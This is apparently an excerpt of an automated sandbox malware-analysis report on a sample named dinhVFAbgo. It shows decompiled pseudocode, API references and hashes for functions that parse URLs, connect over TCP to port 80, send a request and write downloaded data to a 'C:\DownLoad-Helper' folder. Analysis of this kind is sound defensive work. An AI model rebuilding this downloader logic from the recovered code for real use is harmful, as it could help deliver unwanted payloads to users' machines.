									_t60 = _t59 - 1;
									__eflags = _t60;
									if(_t60 == 0) {
										 *_t89 = 2;
										goto L43;
									}
									_t61 = _t60 - 1;
									__eflags = _t61;
									if(_t61 == 0) {
										 *_t89 = 3;
										goto L43;
									}
									_t62 = _t61 - 1;
									__eflags = _t62;
									if(_t62 == 0) {
										 *_t89 = 0x100b;
										goto L43;
									}
									_t63 = _t62 - 1;
									__eflags = _t63;
									if(_t63 == 0) {
										 *_t89 = 0x1001;
										goto L43;
									}
									_t64 = _t63 - 1;
									__eflags = _t64;
									if(_t64 == 0) {
										 *_t89 = 0x1006;
										goto L43;
									}
									__eflags = _t64 != 1;
									if(_t64 != 1) {
										goto L24;
									}
									 *_t89 = 0x1002;
									goto L43;
								} else {
									L24:
									 *_t89 = 0x1000;
									L43:
									_t50 = _t80;
									L28:
									return E00DDCBCE(_t50, _t76, _v8 ^ _t90, _t86, _t88, _t89);
								}
							}
							__eflags =  *(_t88 + 0x2c);
							if( *(_t88 + 0x2c) == 0) {
								L16:
								_t68 = UrlUnescapeA( *(_t88 + 0x2c), 0, 0, 0x2100000);
								__eflags = _t68;
								if(_t68 < 0) {
									L25:
									__eflags = _v2100;
									if(_v2100 == 0) {
										goto L27;
									}
									L26:
									L00CA95BB(_t76);
									goto L27;
								}
								__eflags =  *(_t88 + 0x2c);
								if( *(_t88 + 0x2c) != 0) {
									_t70 = E00DEC1A0( *(_t88 + 0x2c));
								} else {
									_t70 = 0;
								}
								 *((intOrPtr*)(_t88 + 0x30)) = _t70;
								goto L21;
							}
							_t71 = E00DEC1A0( *(_t88 + 0x2c));
							__eflags = _t71 - 0x824;
							if(_t71 >= 0x824) {
								goto L25;
							}
							goto L16;
						}
						goto L26;
					}
				}
			}

0x00cab0f3
0x00cab0fa
0x00cab0fd
0x00cab105
0x00cab109
0x00cab10c
0x00cab112
0x00cab11a
0x00cab28a
0x00cab28a
0x00000000
0x00cab128
0x00cab12d
0x00cab133
0x00cab144
0x00cab14a
0x00cab150
0x00cab156
0x00cab15c
0x00cab16a
0x00cab178
0x00cab16c
0x00cab16c
0x00cab16c
0x00cab16a
0x00cab19a
0x00cab1ee
0x00000000
0x00cab19c
0x00cab19c
0x00cab1a2
0x00cab1a5
0x00000000
0x00000000
0x00cab1ab
0x00cab1b6
0x00cab1bb
0x00000000
0x00000000
0x00cab1cd
0x00cab1e7
0x00cab1f4
0x00cab1fe
0x00cab204
0x00cab20b
0x00cab211
0x00cab255
0x00cab255
0x00cab25c
0x00cab25f
0x00cab264
0x00cab265
0x00cab26b
0x00cab26d
0x00cab29d
0x00cab2a7
0x00cab2ad
0x00cab2ad
0x00cab2b0
0x00cab300
0x00000000
0x00cab300
0x00cab2b2
0x00cab2b2
0x00cab2b5
0x00cab2f8
0x00000000
0x00cab2f8
0x00cab2b7
0x00cab2b7
0x00cab2ba
0x00cab2f0
0x00000000
0x00cab2f0
0x00cab2bc
0x00cab2bc
0x00cab2bf
0x00cab2e8
0x00000000
0x00cab2e8
0x00cab2c1
0x00cab2c1
0x00cab2c4
0x00cab2e0
0x00000000
0x00cab2e0
0x00cab2c6
0x00cab2c6
0x00cab2c9
0x00cab2d8
0x00000000
0x00cab2d8
0x00cab2cb
0x00cab2ce
0x00000000
0x00000000
0x00cab2d0
0x00000000
0x00cab26f
0x00cab26f
0x00cab26f
0x00cab306
0x00cab306
0x00cab28c
0x00cab29a
0x00cab29a
0x00cab26d
0x00cab213
0x00cab217
0x00cab229
0x00cab235
0x00cab23b
0x00cab23d
0x00cab27a
0x00cab27a
0x00cab281
0x00000000
0x00000000
0x00cab283
0x00cab284
0x00000000
0x00cab289
0x00cab23f
0x00cab243
0x00cab24c
0x00cab245
0x00cab245
0x00cab245
0x00cab252
0x00000000
0x00cab252
0x00cab21c
0x00cab222
0x00cab227
0x00000000
0x00000000
0x00000000
0x00cab227
0x00000000
0x00cab1e9
0x00cab19a

APIs

InternetCanonicalizeUrlA.WININET(00000825,?,00000824,?), ref: 00CAB192
GetLastError.KERNEL32 ref: 00CAB19C
InternetCanonicalizeUrlA.WININET(?,00000000,00000824,?), ref: 00CAB1DF
InternetCrackUrlA.WININET(?,00000000,?,02000000), ref: 00CAB1FE
_strlen.LIBCMT ref: 00CAB21C
UrlUnescapeA.SHLWAPI(?,00000000,00000000,02100000), ref: 00CAB235
_strlen.LIBCMT ref: 00CAB24C

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Internet$Canonicalize_strlen$CrackErrorLastUnescape
String ID:
API String ID: 3099573253-0
Opcode ID: b880618e4f75233ad79a8e85f9c3a32f742e7adab4c40e327a0aab105e200ef6
Instruction ID: 6a417cce92f2b05f453ad8e86538416600f595d9e35cd150f60146c2561a1ccc
Opcode Fuzzy Hash: b880618e4f75233ad79a8e85f9c3a32f742e7adab4c40e327a0aab105e200ef6
Instruction Fuzzy Hash: E551807150020BDBDB208F25C9887AEBBF4FF4A708F14829AE49992156DB759FC4CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00D7A0DE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00D7A0DE(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				int _t19;
				int _t20;
				CHAR* _t24;
				intOrPtr _t26;
				void* _t27;
				void* _t28;

				_t28 = __eflags;
				_t22 = __ecx;
				_push(4);
				E00DDD52C(0xe1150b, __ebx, __edi, __esi);
				_t26 = __ecx;
				 *((intOrPtr*)(_t27 - 0x10)) = __ecx;
				E00CAFE92(__ecx, _t28);
				 *((intOrPtr*)(__ecx)) = 0xe2e330;
				 *((intOrPtr*)(__ecx + 0x20)) = 0xe2e310;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(_t27 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x34)) = 0;
				 *((intOrPtr*)(__ecx + 0x38)) = 0;
				 *((intOrPtr*)(__ecx + 0x3c)) = 0;
				E00CB7DC9(__ecx, __edi, __ecx, 3);
				if( *0xe887cc == 0) {
					_t24 = "windows";
					_t19 = GetProfileIntA(_t24, "DragMinDist", 2); // executed
					 *0xe887c4 = _t19; // executed
					_t20 = GetProfileIntA(_t24, "DragDelay", 0xc8); // executed
					 *0xe887c8 = _t20;
					 *0xe887cc = 1;
				}
				E00CB7E3D(_t22, 3);
				return E00DDD4FA(_t26);
			}

0x00d7a0de
0x00d7a0de
0x00d7a0de
0x00d7a0e5
0x00d7a0ea
0x00d7a0ec
0x00d7a0ef
0x00d7a0f6
0x00d7a0fc
0x00d7a103
0x00d7a106
0x00d7a109
0x00d7a10c
0x00d7a111
0x00d7a114
0x00d7a117
0x00d7a11a
0x00d7a11d
0x00d7a129
0x00d7a132
0x00d7a138
0x00d7a149
0x00d7a14e
0x00d7a154
0x00d7a159
0x00d7a159
0x00d7a165
0x00d7a171

APIs

__EH_prolog3.LIBCMT ref: 00D7A0E5

Part of subcall function 00CB7DC9: EnterCriticalSection.KERNEL32(00E86E80,00000001,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7), ref: 00CB7DFA
Part of subcall function 00CB7DC9: InitializeCriticalSection.KERNEL32(00000000,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E10
Part of subcall function 00CB7DC9: LeaveCriticalSection.KERNEL32(00E86E80,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E1E
Part of subcall function 00CB7DC9: EnterCriticalSection.KERNEL32(00000000,?,?,?,00CADACC,00000010,00000008,00CACF17,00CACF54,00CAA535,00CAACCA,00CA2A9E,00CA60A7,?,?,00CA2B44), ref: 00CB7E2B

GetProfileIntA.KERNEL32 ref: 00D7A138
GetProfileIntA.KERNEL32 ref: 00D7A14E

Strings

DragDelay, xrefs: 00D7A143
windows, xrefs: 00D7A132, 00D7A137, 00D7A148
DragMinDist, xrefs: 00D7A12D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CriticalSection$EnterProfile$H_prolog3InitializeLeave
String ID: DragDelay$DragMinDist$windows
API String ID: 3965097884-2101198082
Opcode ID: 8f5fa4b66ecb88b1d454fc854fc5e3a024ceafae4188b9dbbc22d209c63dc128
Instruction ID: 4801dc95d55ba20fc4dc95f034c09e7323e11d6fab5fc9b16b4d026b06bb8788
Opcode Fuzzy Hash: 8f5fa4b66ecb88b1d454fc854fc5e3a024ceafae4188b9dbbc22d209c63dc128
Instruction Fuzzy Hash: 93017CB09407108FD7A0DF75A94674A7AF0FB88B01F906A2EE44AE77A0E7B494458F54

Uniqueness

Uniqueness Score: -1.00%

Function 00CA52E9 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 165
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00CA52E9(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t98;
				void* _t114;
				intOrPtr _t115;
				void* _t118;
				void* _t128;
				void* _t131;
				void* _t135;
				void* _t148;
				intOrPtr _t152;
				intOrPtr _t157;
				void* _t158;
				void* _t162;

				_t162 = __eflags;
				_t148 = __edx;
				_push(0xe7c);
				E00DDD55F(0xe07d4c, __ebx, __edi, __esi);
				_t114 = __ecx;
				E00CA2C3F(_t158 - 0xe5c, __esi, E00CAA9F1());
				 *(_t158 - 4) =  *(_t158 - 4) & 0x00000000;
				E00CA2C3F(_t158 - 0xe60, __esi, E00CAA9F1());
				 *(_t158 - 4) = 1;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				E00DDFBE0(_t158 - 0x134, _t158 - 0x121, 0, 0xf1);
				E00DEAEC2(_t158 - 0x134, 0x104, "\\Update.ini");
				_push(E00CA2DF6(_t158 - 0x134));
				E00CA2CD7(_t114, _t158 - 0xe5c, _t158 - 0x134, 0, _t158 - 0x134);
				E00CA68A8(_t158 - 0xe60, _t114);
				E00CA7572(_t158 - 0xe54);
				 *(_t158 - 4) = 2;
				E00CA2C3F(_t158 - 0xe58, 0, E00CAA9F1());
				 *(_t158 - 4) = 3;
				E00CA2C3F(_t158 - 0xe64, 0, E00CAA9F1());
				 *(_t158 - 4) = 4;
				_t151 =  *((intOrPtr*)(_t158 - 0xe60));
				E00CAAFE6(_t114,  *((intOrPtr*)(_t158 - 0xe60)), _t158 - 0xe74, _t158 - 0xe58, _t158 - 0xe64, _t158 - 0xe6c); // executed
				E00CA7759(_t158 - 0xe54,  *((intOrPtr*)(_t158 - 0xe60)),  *((intOrPtr*)(_t158 - 0xe58)),  *((intOrPtr*)(_t158 - 0xe64)), _t158 - 0xe68);
				_t128 = _t158 - 0xe54;
				E00CA7606(_t128); // executed
				_push(_t128);
				E00CA7685(_t114, _t158 - 0xe54, _t148,  *((intOrPtr*)(_t158 - 0xe58))); // executed
				E00CA7951(_t158 - 0xe54, _t158 - 0xe54, _t158 - 0xe54);
				_t131 = _t158 - 0xe54;
				E00CA7A0F(_t131, _t158 - 0xe54, _t158 - 0xe54); // executed
				_push(_t131);
				_push(_t158 - 0x30);
				_push(_t131);
				E00CA7AC7(_t114, _t158 - 0xe54,  *((intOrPtr*)(_t158 - 0xe60)), 0, _t162);
				_t115 = E00DE7BE1(_t158 - 0xe54, _t158 - 0x30);
				 *((intOrPtr*)(_t158 - 0xe70)) = 0;
				 *((intOrPtr*)(_t158 - 0xe68)) = _t115;
				E00CAB822(_t158 - 0xe88);
				 *(_t158 - 4) = 5;
				_t135 = _t158 - 0xe88;
				_t156 =  *((intOrPtr*)(_t158 - 0xe5c));
				E00CABE73(_t135, _t162,  *((intOrPtr*)(_t158 - 0xe5c)), 0x1001, 0); // executed
				if(_t115 > 0) {
					_t152 =  *((intOrPtr*)(_t158 - 0xe70));
					_t157 = _t115;
					while(1) {
						GetTickCount();
						_push(_t135);
						_t118 = E00CA79A0(_t158 - 0xe54, _t158 - 0x534);
						if(_t118 == 0 || _t118 == 0xffffffff) {
							break;
						}
						GetTickCount();
						_t135 = _t158 - 0xe88;
						E00CAC1FE(_t118, _t135, _t158 - 0x534, _t118);
						_t152 = _t152 + _t118;
						if(_t152 < _t157) {
							continue;
						}
						break;
					}
					_t156 =  *((intOrPtr*)(_t158 - 0xe5c));
					_t151 =  *((intOrPtr*)(_t158 - 0xe60));
				}
				E00CABB76(_t158 - 0xe88);
				_t98 = E00DE6D4C(_t156, 0);
				E00CA2975(E00CA2975(E00CAB8A6(_t158 - 0xe88, _t148),  *((intOrPtr*)(_t158 - 0xe64)) - 0x10),  *((intOrPtr*)(_t158 - 0xe58)) - 0x10);
				E00CA2975(E00CA2975(E00CA75FB(_t158 - 0xe54), _t151 - 0x10), _t156 - 0x10);
				return E00DDD50E(0 | _t98 != 0xffffffff, _t151, _t156);
			}

0x00ca52e9
0x00ca52e9
0x00ca52e9
0x00ca52f3
0x00ca52f8
0x00ca5306
0x00ca530b
0x00ca531b
0x00ca5320
0x00ca533a
0x00ca533b
0x00ca533c
0x00ca533d
0x00ca533e
0x00ca5340
0x00ca5345
0x00ca535b
0x00ca5375
0x00ca537d
0x00ca5389
0x00ca5394
0x00ca5399
0x00ca53a9
0x00ca53ae
0x00ca53be
0x00ca53c9
0x00ca53cd
0x00ca53ea
0x00ca540b
0x00ca5410
0x00ca5416
0x00ca541b
0x00ca5428
0x00ca5435
0x00ca543c
0x00ca5442
0x00ca5447
0x00ca544b
0x00ca544c
0x00ca5453
0x00ca5462
0x00ca5464
0x00ca5470
0x00ca5476
0x00ca547c
0x00ca5480
0x00ca5486
0x00ca5492
0x00ca5499
0x00ca549b
0x00ca54a1
0x00ca54a3
0x00ca54a3
0x00ca54a9
0x00ca54bc
0x00ca54c0
0x00000000
0x00000000
0x00ca54c7
0x00ca54d5
0x00ca54db
0x00ca54e0
0x00ca54e4
0x00000000
0x00000000
0x00000000
0x00ca54e4
0x00ca54e6
0x00ca54ec
0x00ca54ec
0x00ca54f8
0x00ca5500
0x00ca5531
0x00ca554c
0x00ca5558

APIs

__EH_prolog3_GS.LIBCMT ref: 00CA52F3

Part of subcall function 00CA7606: WSAStartup.WS2_32(00000202,?), ref: 00CA7637
Part of subcall function 00CA7606: getprotobyname.WS2_32(tcp), ref: 00CA7642
Part of subcall function 00CA7606: WSAGetLastError.WS2_32 ref: 00CA764A
Part of subcall function 00CA7606: socket.WS2_32(00000002,00000001,?), ref: 00CA7659

Part of subcall function 00CA7685: gethostbyname.WS2_32(?), ref: 00CA76BD
Part of subcall function 00CA7685: htons.WS2_32(00000050), ref: 00CA76E8
Part of subcall function 00CA7685: connect.WS2_32(?,?,00000010), ref: 00CA7734

Part of subcall function 00CA7951: send.WS2_32(?,?,?,00000000), ref: 00CA797D

Part of subcall function 00CA7A0F: setsockopt.WS2_32(?,0000FFFF,00001006,?,00000004), ref: 00CA7A30

Part of subcall function 00CA7AC7: __EH_prolog3.LIBCMT ref: 00CA7ACE

Part of subcall function 00CABE73: _strlen.LIBCMT ref: 00CABEFB

GetTickCount.KERNEL32 ref: 00CA54A3
GetTickCount.KERNEL32 ref: 00CA54C7

Part of subcall function 00CAC1FE: WriteFile.KERNEL32(?,?,?,00000004,00000000,00000000,00000400,?,?,00CA74BE,?,00000000,?,00000000,?,00000400), ref: 00CAC21B
Part of subcall function 00CAC1FE: GetLastError.KERNEL32(00000000,?,00CA74BE,?,00000000,?,00000000,?,00000400,00000000,00000000,?,?,00CA7D3B,?), ref: 00CAC228

Strings

\Update.ini, xrefs: 00CA534A
C:\DownLoad-Helper, xrefs: 00CA532A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: CountErrorLastTick$FileH_prolog3H_prolog3_StartupWrite_strlenconnectgethostbynamegetprotobynamehtonssendsetsockoptsocket
String ID: C:\DownLoad-Helper$\Update.ini
API String ID: 257963179-4209435001
Opcode ID: 29bfd323a76371b312e665f0b10f48feb9ede0a12843cef5362dbadb61ef6b0d
Instruction ID: 3a9906b18fb4c3c7816d2537bc13fdab83a3eecc62415e3ca90c091c132aea50
Opcode Fuzzy Hash: 29bfd323a76371b312e665f0b10f48feb9ede0a12843cef5362dbadb61ef6b0d
Instruction Fuzzy Hash: 885182728045AA9BCB25FB64CD92EDEB338AF15709F0409D9B50972092DFB16F88DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7606 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00CA7637
getprotobyname.WS2_32(tcp), ref: 00CA7642
WSAGetLastError.WS2_32 ref: 00CA764A
socket.WS2_32(00000002,00000001,?), ref: 00CA7659

Strings

tcp, xrefs: 00CA763D

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ErrorLastStartupgetprotobynamesocket
String ID: tcp
API String ID: 3651152377-2993443014
Opcode ID: d8a58c6306a277d31c8b47bfb2188ff26cd01938960bddbc6e36586ba8591fe5
Instruction ID: b5e22acba23cf7b0d49fdd2f996f2720d601c213c09e68297ce4d606c44c4f31
Opcode Fuzzy Hash: d8a58c6306a277d31c8b47bfb2188ff26cd01938960bddbc6e36586ba8591fe5
Instruction Fuzzy Hash: 1801F9312196019FD3209F79DC0ABF6B7A8EB8A721F004B1AF9A9D21E0EBB05448C751

Uniqueness

Uniqueness Score: -1.00%

Function 00CA7685 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 18%

			E00CA7685(void* __ebx, void* __ecx, void* __edx, intOrPtr _a4) {
				signed int _v8;
				signed char _v20;
				short _v22;
				char _v24;
				signed char _v28;
				void* __edi;
				void* __esi;
				signed int _t17;
				signed int _t18;
				short _t24;
				signed char _t25;
				char* _t29;
				void* _t30;
				void* _t42;
				intOrPtr _t43;
				void* _t44;
				signed int _t45;

				_t42 = __edx;
				_t30 = __ebx;
				_t17 =  *0xe68dd4; // 0x8d2643c2
				_t18 = _t17 ^ _t45;
				_v8 = _t18;
				_t43 = _a4;
				_t44 = __ecx;
				if(_t43 == 0) {
					L6:
					_t19 = 0;
				} else {
					if( *((intOrPtr*)(__ecx + 0x908)) != 0) {
						_t18 = E00CA79DF(__ecx);
					}
					 *((intOrPtr*)(_t44 + 0x804)) = 0x50;
					__imp__#52(_t43); // executed
					 *(_t44 + 0x910) = _t18;
					if(_t18 == 0) {
						goto L6;
					} else {
						asm("xorps xmm0, xmm0");
						_v28 =  *( *( *(_t18 + 0xc)));
						_t24 = 2;
						asm("movlpd [ebp-0xc], xmm0");
						_v24 = _t24;
						__imp__#9(0x50);
						_v22 = _t24;
						_t25 = _v28;
						_v20 = _t25;
						E00CA7540(_t44 + 0x808, "%d.%d.%d.%d", _t25 & 0x000000ff);
						_t29 =  &_v24;
						__imp__#4( *((intOrPtr*)(_t44 + 0x90c)), _t29, 0x10, _t25 >> 0x00000008 & 0x000000ff, _t25 >> 0x00000010 & 0x000000ff, _t25 >> 0x18); // executed
						if(_t29 != 0) {
							goto L6;
						} else {
							_t19 = _t29 + 1;
							 *((intOrPtr*)(_t44 + 0x908)) = _t29 + 1;
						}
					}
				}
				return E00DDCBCE(_t19, _t30, _v8 ^ _t45, _t42, _t43, _t44);
			}

0x00ca7685
0x00ca7685
0x00ca768b
0x00ca7690
0x00ca7692
0x00ca7697
0x00ca769a
0x00ca769e
0x00ca7747
0x00ca7747
0x00ca76a4
0x00ca76ab
0x00ca76ad
0x00ca76ad
0x00ca76b3
0x00ca76bd
0x00ca76c3
0x00ca76cb
0x00000000
0x00ca76cd
0x00ca76d0
0x00ca76d9
0x00ca76dc
0x00ca76df
0x00ca76e4
0x00ca76e8
0x00ca76ee
0x00ca76f2
0x00ca76fd
0x00ca7720
0x00ca7728
0x00ca7734
0x00ca773c
0x00000000
0x00ca773e
0x00ca773e
0x00ca773f
0x00ca773f
0x00ca773c
0x00ca76cb
0x00ca7756

APIs

gethostbyname.WS2_32(?), ref: 00CA76BD
htons.WS2_32(00000050), ref: 00CA76E8
connect.WS2_32(?,?,00000010), ref: 00CA7734

Part of subcall function 00CA79DF: closesocket.WS2_32(?), ref: 00CA79ED

Strings

%d.%d.%d.%d, xrefs: 00CA771A

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: closesocketconnectgethostbynamehtons
String ID: %d.%d.%d.%d
API String ID: 1592981187-3491811756
Opcode ID: 699ee54b3698503ac71be891f67c5eb39160343a6cd2d4b8adca8eb71e4a46f1
Instruction ID: 4545550d80d9c949db780621cab102ae6e0a24f68ab3f8e6ed752d00ea88413b
Opcode Fuzzy Hash: 699ee54b3698503ac71be891f67c5eb39160343a6cd2d4b8adca8eb71e4a46f1
Instruction Fuzzy Hash: 7921AC70A0060A9FD740DF69DC15BAFB7F8FF89304F10421EE456E3291EB70AA449BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00CD8EE2 Relevance: 6.1, APIs: 4, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E00CD8EE2(intOrPtr* __ecx, void* __edx, void* __fp0) {
				signed int _v8;
				struct _OSVERSIONINFOEXA _v164;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				longlong _t15;
				void* _t28;
				void* _t29;
				intOrPtr* _t32;
				signed int _t33;
				void* _t39;

				_t39 = __fp0;
				_t28 = __edx;
				_t11 =  *0xe68dd4; // 0x8d2643c2
				_t12 = _t11 ^ _t33;
				_v8 = _t11 ^ _t33;
				_t32 = __ecx;
				if( *__ecx == 0) {
					_v164.dwOSVersionInfoSize = 0x9c;
					_v164.dwMajorVersion = 6;
					_v164.dwMinorVersion = 1;
					_t15 = E00DDFBE0(1,  &(_v164.dwBuildNumber), 0, 0x90);
					__imp__VerSetConditionMask(0, 0, 2, 3, 1, 3, _t29);
					__imp__VerSetConditionMask(_t15, _t28);
					 *((intOrPtr*)(_t32 + 0x17c)) = VerifyVersionInfoA( &_v164, 3, _t15);
					 *((intOrPtr*)(_t32 + 0x180)) = GetSystemMetrics(0x1000);
					E00CD96DD(0, _t32, _t28, 1, _t32, 1); // executed
					E00CD91A9(0, _t32, _t28, 1, _t32, 1, _t39); // executed
					_t12 = E00CD8FC9(_t32);
					 *((intOrPtr*)(_t32 + 0x19c)) = 1;
					_t29 = _t28;
				}
				return E00DDCBCE(_t12, 0, _v8 ^ _t33, _t28, _t29, _t32);
			}

0x00cd8ee2
0x00cd8ee2
0x00cd8eeb
0x00cd8ef0
0x00cd8ef2
0x00cd8ef7
0x00cd8efd
0x00cd8f0b
0x00cd8f1b
0x00cd8f28
0x00cd8f2e
0x00cd8f3f
0x00cd8f47
0x00cd8f63
0x00cd8f71
0x00cd8f77
0x00cd8f7e
0x00cd8f85
0x00cd8f8a
0x00cd8f90
0x00cd8f90
0x00cd8f9e

APIs

VerSetConditionMask.KERNEL32(00000000,00000000,00000002,00000003,00000001,00000003), ref: 00CD8F3F
VerSetConditionMask.KERNEL32(00000000), ref: 00CD8F47
VerifyVersionInfoA.KERNEL32(0000009C,00000003,00000000), ref: 00CD8F58
GetSystemMetrics.USER32 ref: 00CD8F69

Part of subcall function 00CD96DD: __EH_prolog3.LIBCMT ref: 00CD96E4
Part of subcall function 00CD96DD: GetSysColor.USER32(00000016), ref: 00CD96ED
Part of subcall function 00CD96DD: GetSysColor.USER32(0000000F), ref: 00CD9700
Part of subcall function 00CD96DD: GetSysColor.USER32(00000015), ref: 00CD9717
Part of subcall function 00CD96DD: GetSysColor.USER32(0000000F), ref: 00CD9723
Part of subcall function 00CD96DD: GetDeviceCaps.GDI32(?,0000000C), ref: 00CD974B
Part of subcall function 00CD96DD: GetSysColor.USER32(0000000F), ref: 00CD9759
Part of subcall function 00CD96DD: GetSysColor.USER32(00000010), ref: 00CD9767
Part of subcall function 00CD96DD: GetSysColor.USER32(00000015), ref: 00CD9775
Part of subcall function 00CD96DD: GetSysColor.USER32(00000016), ref: 00CD9783
Part of subcall function 00CD96DD: GetSysColor.USER32(00000014), ref: 00CD9791
Part of subcall function 00CD96DD: GetSysColor.USER32(00000012), ref: 00CD979F
Part of subcall function 00CD96DD: GetSysColor.USER32(00000011), ref: 00CD97AD
Part of subcall function 00CD96DD: GetSysColor.USER32(00000006), ref: 00CD97B8
Part of subcall function 00CD96DD: GetSysColor.USER32(0000000D), ref: 00CD97C3
Part of subcall function 00CD96DD: GetSysColor.USER32(0000000E), ref: 00CD97CE
Part of subcall function 00CD96DD: GetSysColor.USER32(00000005), ref: 00CD97D9
Part of subcall function 00CD96DD: GetSysColor.USER32(00000008), ref: 00CD97E7
Part of subcall function 00CD96DD: GetSysColor.USER32(00000009), ref: 00CD97F2
Part of subcall function 00CD96DD: GetSysColor.USER32(00000007), ref: 00CD97FD
Part of subcall function 00CD96DD: GetSysColor.USER32(00000002), ref: 00CD9808
Part of subcall function 00CD96DD: GetSysColor.USER32(00000003), ref: 00CD9813
Part of subcall function 00CD96DD: GetSysColor.USER32(0000001B), ref: 00CD9821
Part of subcall function 00CD96DD: GetSysColor.USER32(0000001C), ref: 00CD982F
